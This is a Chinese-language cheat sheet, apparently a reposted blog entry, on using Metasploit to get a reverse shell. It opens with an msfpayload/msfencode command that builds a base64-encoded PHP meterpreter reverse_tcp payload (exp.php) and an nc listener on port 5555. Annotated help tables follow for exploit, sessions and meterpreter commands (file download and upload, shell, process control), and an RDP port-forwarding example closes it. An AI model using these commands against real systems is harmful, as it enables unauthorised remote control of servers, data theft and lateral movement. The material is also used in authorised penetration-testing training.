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  • msfpayload反弹shell



    启动PostgreSQL服务:service postgresql start
    启动metasploit服务:service metasploit start



    msfpayload php/meterpreter/reverse_tcp LHOST= LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php

    exp.php需要加上<?php  ?>



    nc -lvp 5555



    exploit -h
     -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.  有效负载编码,默认使用
        -f        Force the exploit to run regardless of the value of MinimumRank.
        -h        Help banner.
        -j        Run in the context of a job.  在后台中运行
        -n <opt>  The NOP generator to use.  If none is specified, NOP is used.
        -o <opt>  A comma separated list of options in VAR=VAL format.
        -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
        -t <opt>  The target index to use.  If none is specified, TARGET is used.
        -z        Do not interact with the session after successful exploitation  建立会话放到后台
    sessions -h 
        -K        Terminate all sessions  杀死所有sessions
        -c <opt>  Run a command on the session given with -i, or all 执行一个命令
        -d <opt>  Detach an interactive session
        -h        Help banner
        -i <opt>  Interact with the supplied session ID   连接会话
        -k <opt>  Terminate sessions by session ID and/or range
        -l        List all active sessions
        -q        Quiet mode
        -r        Reset the ring buffer for the session given with -i, or all
        -s <opt>  Run a script on the session given with -i, or all
        -t <opt>  Set a response timeout (default: 15)
        -u <opt>  Upgrade a shell to a meterpreter session on many platforms
        -v        List verbose fields


    Core Commands 代码命令
        Command                   Description
        -------                   -----------
        ?                         Help menu  查看帮助
        background                Backgrounds the current session 将sessions保存到后台
        bgkill                    Kills a background meterpreter script  杀死后台meterpreter脚本
        bglist                    Lists running background scripts 列出后台meterpreter脚本
        bgrun                     Executes a meterpreter script as a background thread   在后台进程中执行一个脚本
        channel                   Displays information about active channels  显示活动的通道
        close                     Closes a channel  关闭通道
        disable_unicode_encoding  Disables encoding of unicode strings
        enable_unicode_encoding   Enables encoding of unicode strings
        exit                      Terminate the meterpreter session  退出
        help                      Help menu
        info                      Displays information about a Post module
        interact                  Interacts with a channel
        irb                       Drop into irb scripting mode  开启ruby终端
        load                      Load one or more meterpreter extensions
        quit                      Terminate the meterpreter session
        read                      Reads data from a channel
        resource                  Run the commands stored in a file
        run                       Executes a meterpreter script or Post module
        use                       Deprecated alias for 'load'
        write                     Writes data to a channel
    Stdapi: File system Commands  文件命令
        Command       Description
        -------       -----------
        cat           Read the contents of a file to the screen
        cd            Change directory
        download      Download a file or directory
        edit          Edit a file
        getlwd        Print local working directory
        getwd         Print working directory
        lcd           Change local working directory
        lpwd          Print local working directory
        ls            List files
        mkdir         Make directory
        pwd           Print working directory
        rm            Delete the specified file
        rmdir         Remove directory
        search        Search for files
        upload        Upload a file or directory
    Stdapi: Networking Commands 网络命令
        Command       Description
        -------       -----------
        portfwd       Forward a local port to a remote service  端口转发
       portfwd  add -l 5555 -p 3389 -r 将192.168.198.129的3389端口转发到本地的5555端口 Stdapi: System Commands
    ======================= Command Description ------- ----------- execute Execute a command 执行命令 getenv Get one or more environment variable values getpid Get the current process identifier getuid Get the user that the server is running as kill Terminate a process ps List running processes shell Drop into a system command shell 生成一个shell sysinfo Gets information about the remote system, such as OS 查看系统信息


  • 相关阅读:
  • 原文地址:https://www.cnblogs.com/BloodZero/p/4425729.html
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